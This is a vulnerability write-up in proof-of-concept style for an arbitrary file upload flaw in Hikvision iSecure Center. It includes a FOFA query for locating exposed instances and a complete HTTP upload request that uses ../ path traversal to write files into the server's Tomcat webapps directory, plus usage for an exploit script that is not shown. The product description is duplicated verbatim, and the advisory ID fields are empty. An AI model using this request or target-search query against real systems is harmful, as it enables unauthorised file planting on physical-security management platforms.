Hikvision isecure center comprehensive security management platform arbitrary file upload vulnerability

Disclaimer:

Do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article shall be borne by the user himself. All adverse consequences and The author of the article is irrelevant. This article is for educational purposes only.

1. Brief introduction of Hikvision isecure center comprehensive security management platform

HIKVISION iSecure Center comprehensive security management platform is a set of "integrated" and "intelligent" platforms, which can obtain edge node data by accessing video surveillance, all-in-one card, parking lot, alarm detection and other system equipment to realize security information integration With the linkage with the electronic map, it integrates the capabilities of each system to realize rich intelligent applications. The HIKVISION iSecure Center platform is designed based on the advanced concept of "unified software technology architecture", and adopts business component technology to meet the elastic expansion of the platform in terms of business. The platform is applicable to the general comprehensive security business of the whole industry. It integrates and centrally manages the resources of each system, and realizes unified deployment, unified configuration, unified management and unified scheduling.

2. Vulnerability description

HIKVISION iSecure Center comprehensive security management platform is a set of "integrated" and "intelligent" platforms, which can obtain edge node data by accessing video surveillance, all-in-one card, parking lot, alarm detection and other system equipment to realize security information integration With the linkage with the electronic map, it integrates the capabilities of each system to realize rich intelligent applications. The HIKVISION iSecure Center platform is designed based on the advanced concept of "unified software technology architecture", and adopts business component technology to meet the elastic expansion of the platform in terms of business. The platform is applicable to the general comprehensive security business of the whole industry. It integrates and centrally manages the resources of each system, and realizes unified deployment, unified configuration, unified management and unified scheduling. Hikvision isecure center comprehensive security management platform has an arbitrary file upload vulnerability

CVE编号:
CNNVD编号:
CNVD编号:

Three, the impact version

HIKVISION iSecure Center integrated security management platform

Four, fofa query statement

app=“HIKVISION-iSecure-Center”

5. Vulnerability recurrence

Vulnerability link: https://127.0.0.1/clusterMgr/836424300.txt;.js vulnerability data package:

POST /center/api/files;.js HTTP/1.1
Host: 127.0.0.1
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 257
Content-Type: multipart/form-data; boundary=ea26cdac4990498b32d7a95ce5a5135c

--ea26cdac4990498b32d7a95ce5a5135c
Content-Disposition: form-data; name="file"; filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/153107606.txt"
Content-Type: application/octet-stream

332299402
--ea26cdac4990498b32d7a95ce5a5135c--

The uploaded file is located at /clusterMgr/153107606.txt;.js Change 153107606 to the file name you uploaded in the data package above. successfully uploaded

6. POC&EXP

Usage: python3 .\vuln31.py https://127.0.0.1/ Remember to end with /.

7. Opinions on rectification

Please contact the manufacturer to find a solution: https://www.hikvision.com/cn/